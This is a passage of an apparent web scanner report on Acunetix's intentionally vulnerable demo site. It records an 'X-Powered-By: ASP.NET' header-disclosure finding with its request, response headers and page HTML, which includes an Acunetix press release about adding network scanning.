A+VXNlci1mcmllbmRseSBhbmQgY29tcGV0aXRpdmVseSBwcmljZWQsIEFjdW5ldGl4IGxlYWRzIHRoZSBtYXJrZXQgaW4gYXV0b21hdGljIHdlYiBzZWN1cml0eSB0ZXN0aW5nIHRlY2hub2xvZ3kuIEl0cyBpbmR1c3RyeS1sZWFkaW5nIGNyYXdsZXIgZnVsbHkgc3VwcG9ydHMgSFRNTDUsIEphdmFTY3JpcHQsIGFuZCBBSkFYLWhlYXZ5IHdlYnNpdGVzLCBlbmFibGluZyB0aGUgYXVkaXRpbmcgb2YgY29tcGxleCwgYXV0aGVudGljYXRlZCBhcHBsaWNhdGlvbnMuIEFjdW5ldGl4IHByb3ZpZGVzIHRoZSBvbmx5IHRlY2hub2xvZ3kgb24gdGhlIG1hcmtldCB0aGF0IGNhbiBhdXRvbWF0aWNhbGx5IGRldGVjdCBvdXQtb2YtYmFuZCB2dWxuZXJhYmlsaXRpZXMgYW5kIGlzIGF2YWlsYWJsZSBib3RoIGFzIGFuIG9ubGluZSBhbmQgb24tcHJlbWlzZXMgc29sdXRpb24uIEFjdW5ldGl4IGFsc28gaW5jbHVkZXMgaW50ZWdyYXRlZCB2dWxuZXJhYmlsaXR5IG1hbmFnZW1lbnQgZmVhdHVyZXMgdG8gZXh0ZW5kIHRoZSBlbnRlcnByaXNlJnJzcXVvO3MgYWJpbGl0eSB0byBjb21wcmVoZW5zaXZlbHkgbWFuYWdlLCBwcmlvcml0aXplLCBhbmQgY29udHJvbCB2dWxuZXJhYmlsaXR5IHRocmVhdHMgJm5kYXNoOyBvcmRlcmVkIGJ5IGJ1c2luZXNzIGNyaXRpY2FsaXR5LjwvcD4gICAgIDxwPjxzdHJvbmc+QWN1bmV0aXgsIHRoZSBDb21wYW55PC9zdHJvbmc+PC9wPiAgICAgPHA+Rm91bmRlZCBpbiAyMDA0IHRvIGNvbWJhdCB0aGUgYWxhcm1pbmcgcmlzZSBpbiB3ZWIgYXBwbGljYXRpb24gYXR0YWNrcywgQWN1bmV0aXggaXMgdGhlIG1hcmtldCBsZWFkZXIgYW5kIGEgcGlvbmVlciBpbiBhdXRvbWF0ZWQgd2ViIGFwcGxpY2F0aW9uIHNlY3VyaXR5IHRlY2hub2xvZ3kuIEZyb20gaW5kaXZpZHVhbCBjb25zdWx0YW50cyB0byBlbnRlcnByaXNlcywgcGVuZXRyYXRpb24gdGVzdGVycyBhbmQgc2VjdXJpdHkgZXhwZXJ0cyBnbG9iYWxseSBkZXBlbmQgb24gQWN1bmV0aXggcHJvZHVjdHMgYW5kIHRlY2hub2xvZ2llcy4gSXQgaXMgdGhlIHRvb2wgb2YgY2hvaWNlIGZvciBtYW55IGN1c3RvbWVycyBhY3Jvc3Mgc2VjdG9ycywgaW5jbHVkaW5nIEdvdmVybm1lbnQsIE1pbGl0YXJ5LCBFZHVjYXRpb24sIFRlbGVjb21tdW5pY2F0aW9ucywgQmFua2luZywgRmluYW5jZSwgYW5kIEUtQ29tbWVyY2Ugc2VjdG9ycyBhcyB3ZWxsIGFzIG1hbnkgRm9ydHVuZSA1MDAgY29tcGFuaWVzIHN1Y2ggYXMgdGhlIFBlbnRhZ29uLCBIYXJwZXIgQ29sbGlucywgRGlzbmV5LCBBZG9iZSwgYW5kIG1hbnkgbW9yZS48L3A+ZAIJDw8WAh4LTmF2aWdhdGVVcmwFEkNvbW1lbnRzLmFzcHg/aWQ9MGRkAgsPFgIeA3NyYwUMYWRzL2RlZi5odG1sZGTxtiNRXSWMk2xH7U3KJPX1k9tDKQ==" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="532053C5" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLWjL6iDQL+kPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK+b8FAor5vwUCivnT2QkCivnT2QkCivnH/AICivnH/AICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P/xAkCv5P/xAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBAoC8+YwLqXVDFYA1YYr1Hu6oI9o" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD vAlign="top"> <DIV id="divNewsDate" class="NewsDate">posted by <strong>admin </strong>5/16/2019 12:32:30 PM</DIV> <DIV id="divNewsTitle" class="NewsTitle">Acunetix Vulnerability Scanner Now With Network Security Scans</DIV> <DIV id="divNewsLong" class="NewsLong"><p><strong>London, UK</strong> – <strong>May 2019</strong> – Acunetix, the pioneer in automated web application security software, has announced that all versions of the <a href=https://www.acunetix.com/vulnerability-scanner/>Acunetix Vulnerability Scanner</a> now support <a href=https://www.acunetix.com/vulnerability-scanner/network-security-scanner/>network security scanning</a>. Network security scans are possible thanks to the seamless integration of Acunetix with the powerful OpenVAS security solution. Until now, network security scanning functionality was available only in Acunetix Online.</p> <p>“No matter the size of your business, you use multiple security measures to alleviate different types of risks. Your security strategy must always include both web security scans and network security scans. And it makes it so much easier and much more efficient if you can do the two together using a single integrated tool,” said Nicolas Sciberras, CTO.</p> <p>There are many advantages of running network security scans in Acunetix. Having a single integrated dashboard with both web and network vulnerabilities gives the best possible risk visibility and saves a lot of time and effort. Network scans may also benefit from other Acunetix features, such as <a href=https://www.acunetix.com/vulnerability-scanner/acunetix-integrations/>issue tracker integration</a> and <a href=https://www.acunetix.com/vulnerability-scanner/vulnerability-management-regulatory-compliance/>comprehensive reporting</a>.</p> <p><strong>More Features in the Latest Build</strong></p> <p>OpenVAS integration is introduced as part of the latest Acunetix version 12 build (<a href=https://www.acunetix.com/blog/releases/new-build-network-scanning-integration-ipv6-support/>build 12.0.190515149</a>). This new build also includes:</p> <p>- Support for IPv6<br /> - Improved usage of machine resources<br /> - Added support for Selenium scripts as import files<br /> - Multiple vulnerability checks for SAP<br /> - Unauthorized access detection for Redis and Memcached<br /> - Source code disclosure for Ruby and Python</p> <p>The new build also includes a number of updates and fixes, all of which are available for both Windows and Linux. More information can be found <a href=https://www.acunetix.com/blog/releases/new-build-network-scanning-integration-ipv6-support/>here</a>.</p> <p>Get a demo of the product <a href=https://www.acunetix.com/network-security-scanner/>here</a>.</p> <p><strong>About Acunetix</strong></p> <p>User-friendly and competitively priced, Acunetix leads the market in automatic web security testing technology. Its industry-leading crawler fully supports HTML5, JavaScript, and AJAX-heavy websites, enabling the auditing of complex, authenticated applications. Acunetix provides the only technology on the market that can automatically detect out-of-band vulnerabilities and is available both as an online and on-premises solution. Acunetix also includes integrated vulnerability management features to extend the enterprise’s ability to comprehensively manage, prioritize, and control vulnerability threats – ordered by business criticality.</p> <p><strong>Acunetix, the Company</strong></p> <p>Founded in 2004 to combat the alarming rise in web application attacks, Acunetix is the market leader and a pioneer in automated web application security technology. From individual consultants to enterprises, penetration testers and security experts globally depend on Acunetix products and technologies. It is the tool of choice for many customers across sectors, including Government, Military, Education, Telecommunications, Banking, Finance, and E-Commerce sectors as well as many Fortune 500 companies such as the Pentagon, Harper Collins, Disney, Adobe, and many more.</p></DIV> <TABLE id="Table2" cellSpacing="0" cellPadding="0" width="500" border="0"> <TR> <TD vAlign="bottom"><IMG src="images/comment-before.gif"></TD> </TR> <TR> <TD class="Comment" vAlign="middle"> <a id="hlComments" href="Comments.aspx?id=0">Read user comments</a></TD> </TR> <TR> <TD vAlign="top"><IMG src="images/comment-after.gif"></TD> </TR> </TABLE> <center> <iframe id="adsFrame" src="ads/def.html" width="200" height="110" style="BORDER-RIGHT: lemonchiffon 1px solid; BORDER-TOP: lemonchiffon 1px solid; BORDER-LEFT: lemonchiffon 1px solid; BORDER-BOTTOM: lemonchiffon 1px solid" frameBorder="no" scrolling="no"></iframe> </center> </TD> <TD vAlign="top" width="200" colSpan="2"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8340')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">December 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8401')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8366')" style="color:Black" title="November 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8367')" style="color:Black" title="November 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8368')" style="color:Black" title="November 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8369')" style="color:Black" title="November 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8370')" style="color:Black" title="December 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8371')" style="color:Black" title="December 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8372')" style="color:Black" title="December 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8373')" style="color:Black" title="December 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8374')" style="color:Black" title="December 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8375')" style="color:Black" title="December 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8376')" style="color:Black" title="December 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8377')" style="color:Black" title="December 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8378')" style="color:Black" title="December 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8379')" style="color:Black" title="December 10">10</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8380')" style="color:Black" title="December 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8381')" style="color:Black" title="December 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8382')" style="color:Black" title="December 13">13</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8383')" style="color:Black" title="December 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8384')" style="color:Black" title="December 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8385')" style="color:Black" title="December 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8386')" style="color:Black" title="December 17">17</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8387')" style="color:Black" title="December 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8388')" style="color:Black" title="December 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8389')" style="color:Black" title="December 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8390')" style="color:Black" title="December 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8391')" style="color:Black" title="December 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8392')" style="color:Black" title="December 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8393')" style="color:Black" title="December 24">24</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8394')" style="color:Black" title="December 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8395')" style="color:Black" title="December 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8396')" style="color:Black" title="December 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8397')" style="color:Black" title="December 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8398')" style="color:Black" title="December 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8399')" style="color:Black" title="December 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8400')" style="color:Black" title="December 31">31</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8401')" style="color:Black" title="January 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8402')" style="color:Black" title="January 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8403')" style="color:Black" title="January 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8404')" style="color:Black" title="January 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8405')" style="color:Black" title="January 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8406')" style="color:Black" title="January 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8407')" style="color:Black" title="January 07">7</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="3"></TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;left:30%;position:fixed;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/ReadNews.aspx?id=2
Method	GET
Parameter
Attack
Evidence	X-Powered-By: ASP.NET
Show / hide Request and Response
Request Header - size: 349 bytes.	GET http://testaspnet.vulnweb.com/ReadNews.aspx?id=2 HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testaspnet.vulnweb.com/Comments.aspx?id=2 Cookie: ASP.NET_SessionId=3qnlyw45qx3ugzagkbwuyse5
Request Body - size: 0 bytes.
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:41:16 GMT Content-Length: 30545
Response Body - size: 30,545 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>ReadNews</title> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="ReadNews.aspx?id=2" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTM1MjIzMjU2OQ9kFgICAQ9kFgwCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgMPFgIfAQVJcG9zdGVkIGJ5IDxzdHJvbmc+YWRtaW4gICAgICAgICAgICAgICAgICAgIDwvc3Ryb25nPjExLzgvMjAwNSAxMTozNToyMiBBTWQCBQ8WAh8BBTxXZWIgYXR0YWNrcyAtIGNhbiB5b3VyIHdlYiBhcHBsaWNhdGlvbnMgd2l0aHN0YW5kIHRoZSBmb3JjZT9kAgcPFgIfAQWbODxwPjxzdHJvbmc+QWN1bmV0aXggY29tYmF0cyByaXNlIGluIHdlYiBhdHRhY2tzIHdpdGggQWN1bmV0aXggICAgICAgICAgICAgICAgICAgICAgICAgICAgV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lciAyIDwvc3Ryb25nPjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD4yMSBKdWx5IDIwMDUgLSA8c3Ryb25nPlN0YXJ0LXVwIGNvbXBhbnkgQWN1bmV0aXggcmVsZWFzZWQgICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lcjogYSB0b29sIHRvIGF1dG9tYXRpY2FsbHkgICAgICAgICAgICAgICAgICAgICAgICAgICAgYXVkaXQgd2Vic2l0ZSBzZWN1cml0eS4gQWN1bmV0aXggV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lciAgICAgICAgICAgICAgICAgICAgICAgICAgICAyIGNyYXdscyBhbiBlbnRpcmUgd2Vic2l0ZSwgbGF1bmNoZXMgcG9wdWxhciB3ZWIgYXR0YWNrcyAgICAgICAgICAgICAgICAgICAgICAgICAgICAoU1FMIEluamVjdGlvbiBldGMuKSBhbmQgaWRlbnRpZmllcyB2dWxuZXJhYmlsaXRpZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgdGhhdCBuZWVkIHRvIGJlIGZpeGVkLjwvc3Ryb25nPiA8L3A+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA+PHN0cm9uZz5TZWN1cmluZyB5b3VyIHdlYnNpdGUgc2hvdWxkIGJlIHlvdXIgbnVtYmVyIG9uZSAgICAgICAgICAgICAgICAgICAgICAgICAgICBjb25jZXJuPC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgSGFja2VycyBhcmUgY29uY2VudHJhdGluZyB0aGVpciBlZmZvcnRzIG9uIHdlYi1iYXNlZCAgICAgICAgICAgICAgICAgICAgICAgICAgICBhcHBsaWNhdGlvbnMgLSA3NSUgb2YgY3liZXIgYXR0YWNrcyBhcmUgZG9uZSBhdCB0aGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgd2ViIGFwcGxpY2F0aW9uIGxldmVsLCBhIEdhcnRuZXIgR3JvdXAgc3R1ZHkgaGFzIHJldmVhbGVkLiAgICAgICAgICAgICAgICAgICAgICAgICAgICBXZWIgYXBwbGljYXRpb25zIGFyZSBhY2Nlc3NpYmxlIDI0IGhvdXJzIGEgZGF5LCA3IGRheXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgYSB3ZWVrIGFuZCBjb250cm9sIHZhbHVhYmxlIGRhdGEgc3VjaCBhcyBjdXN0b21lciBpbmZvcm1hdGlvbiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgdHJhbnNhY3Rpb24gaW5mb3JtYXRpb24gYW5kIGV2ZW4gcHJvcHJpZXRhcnkgY29ycG9yYXRlICAgICAgICAgICAgICAgICAgICAgICAgICAgIGRhdGEuPC9wPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDxwPjxzdHJvbmc+NTAwLDAwMCBjdXN0b21lciBjcmVkaXQgY2FyZCBudW1iZXJzIG9idGFpbmVkIHZpYSAgICAgICAgICAgICAgICAgICAgICAgICAgICBhIHdlYiBhdHRhY2s8L3N0cm9uZz48YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICBXZWxsLWtub3duIHNpdGVzIHRoYXQgd2VyZSBvcGVuIHRvIHdlYiBhcHBsaWNhdGlvbiBhdHRhY2tzICAgICAgICAgICAgICAgICAgICAgICAgICAgIGluY2x1ZGUgZmFzaGlvbiBsYWJlbCBHdWVzcyBhbmQgcGV0IHN1cHBseSByZXRhaWxlciAgICAgICAgICAgICAgICAgICAgICAgICAgICBQZXRDby5jb20gd2hvIHdlcmUgbm90b3Jpb3VzbHkgZm91bmQgdG8gYmUgdnVsbmVyYWJsZSAgICAgICAgICAgICAgICAgICAgICAgICAgICB0byB0aGUgU1FMIGluamVjdGlvbiB2dWxuZXJhYmlsaXR5IChKdW5lIDIwMDMpLiBUaGlzICAgICAgICAgICAgICAgICAgICAgICAgICAgIHJlc3VsdGVkIGluIFBldENvIGxlYXZpbmcgYXMgbWFueSBhcyA1MDAsMDAwIGNyZWRpdCAgICAgICAgICAgICAgICAgICAgICAgICAgICBjYXJkIG51bWJlcnMgb3BlbiB0byBhbnlvbmUgYWJsZSB0byBjb25zdHJ1Y3QgdGhpcyBzcGVjaWFsbHktY3JhZnRlZCAgICAgICAgICAgICAgICAgICAgICAgICAgICBVUkwuPC9wPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDxwPjxzdHJvbmc+RmlyZXdhbGxzLCBTU0wgYW5kIGxvY2tlZC1kb3duIHNlcnZlcnMgYXJlIGZ1dGlsZSAgICAgICAgICAgICAgICAgICAgICAgICAgICBhZ2FpbnN0IHdlYiBhcHBsaWNhdGlvbiBoYWNraW5nPC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgQW55IGRlZmVuc2UgYXQgbmV0d29yayBzZWN1cml0eSBsZXZlbCB3aWxsIHByb3ZpZGUgbm8gICAgICAgICAgICAgICAgICAgICAgICAgICAgcHJvdGVjdGlvbiBhZ2FpbnN0IHdlYiBhcHBsaWNhdGlvbiBhdHRhY2tzIHNpbmNlIHRoZXkgICAgICAgICAgICAgICAgICAgICAgICAgICAgYXJlIGxhdW5jaGVkIG9uIHBvcnQgODAgLSB3aGljaCBoYXMgdG8gcmVtYWluIG9wZW4uICAgICAgICAgICAgICAgICAgICAgICAgICAgIEluIGFkZGl0aW9uLCB3ZWIgYXBwbGljYXRpb25zIChjdXN0b21lciBhcmVhcywgc2hvcHBpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgY2FydHMgZXRjLikgYXJlIG9mdGVuIHRhaWxvci1tYWRlLCBpbnZhcmlhYmx5IHRlc3RlZCAgICAgICAgICAgICAgICAgICAgICAgICAgICBsZXNzIHRoYW4gb2ZmLXRoZS1zaGVsZiBzb2Z0d2FyZSBhbmQgYXJlIHRoZXJlZm9yZSBtb3JlICAgICAgICAgICAgICAgICAgICAgICAgICAgIHN1c2NlcHRpYmxlIHRvIGF0dGFjay48L3A+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA+JnF1b3Q7Q29tcGFuaWVzIGhhdmUgaW1wbGVtZW50ZWQgbmV0d29yay1sZXZlbCBzZWN1cml0eSwgICAgICAgICAgICAgICAgICAgICAgICAgICAgaG93ZXZlciB0aGV5IGZhaWwgdG8gYXVkaXQgYW5kIHNlY3VyZSB0aGVpciB3ZWIgYXBwbGljYXRpb25zLiAgICAgICAgICAgICAgICAgICAgICAgICAgICBUaGVzZSBhcHBsaWNhdGlvbnMgaGF2ZSBhY2Nlc3MgdG8gc2Vuc2l0aXZlIGRhdGEgYW5kICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFyZSBhIGhhY2tlcidzIHByaW1lIHRhcmdldCwmcXVvdDsgc2FpZCBOaWNrIEdhbGVhLCAgICAgICAgICAgICAgICAgICAgICAgICAgICBDRU8gb2YgQWN1bmV0aXguICZxdW90O0F1ZGl0aW5nIG9uZSdzIHdlYiBhcHBzIHNob3VsZCAgICAgICAgICAgICAgICAgICAgICAgICAgICBiZSB0aGUgbnVtYmVyIG9uZSBzZWN1cml0eSBjb25jZXJuLiZxdW90OzwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPlRoZSBuZWVkIGZvciBhbiBhdXRvbWF0ZWQgd2ViIGFwcGxpY2F0aW9uIHZ1bG5lcmFiaWxpdHkgICAgICAgICAgICAgICAgICAgICAgICAgICAgc2Nhbm5lcjwvc3Ryb25nPjxiciAvPiAgICAgICAgICAgICAgICAgICAgICAgICAgIE1hbnVhbGx5IGF1ZGl0aW5nIGEgd2ViIGFwcGxpY2F0aW9uIGZvciB2dWxuZXJhYmlsaXRpZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgdG8gU1FMIGluamVjdGlvbiwgY3Jvc3Mgc2l0ZSBzY3JpcHRpbmcgYW5kIG90aGVyIHdlYiAgICAgICAgICAgICAgICAgICAgICAgICAgICBhdHRhY2tzIGlzIHZpcnR1YWxseSBpbXBvc3NpYmxlLiBXaXRoIEFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5ICAgICAgICAgICAgICAgICAgICAgICAgICAgIFNjYW5uZXIgdGhlIHByb2Nlc3Mgb2YgYXVkaXRpbmcgd2ViIGFwcGxpY2F0aW9ucyBzdWNoICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFzIHNob3BwaW5nIGNhcnRzIGFuZCBmb3JtcywgY2FuIGJlIGVhc2lseSBhdXRvbWF0ZWQuICAgICAgICAgICAgICAgICAgICAgICAgICAgIFdoYXQncyBtb3JlLCB0aGUgc2VjdXJpdHkgY2hlY2tzIGNhbiBlYXNpbHkgYmUgcmUtbGF1bmNoZWQgICAgICAgICAgICAgICAgICAgICAgICAgICAgZm9yIGVhY2ggYXBwbGljYXRpb24gdXBkYXRlLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPkhvdyBBY3VuZXRpeCBXZWIgVnVsbmVyYWJpbGl0eSBTY2FubmVyIHdvcmtzPC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV1ZTIGZpcnN0IGNyYXdscyB0aGUgd2hvbGUgd2Vic2l0ZSwgYW5hbHl6ZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgaW4tZGVwdGggZWFjaCBmaWxlIGl0IGZpbmRzLCBhbmQgZGlzcGxheXMgdGhlIGVudGlyZSAgICAgICAgICAgICAgICAgICAgICAgICAgICB3ZWJzaXRlIHN0cnVjdHVyZS4gQWZ0ZXIgdGhpcyBkaXNjb3Zlcnkgc3RhZ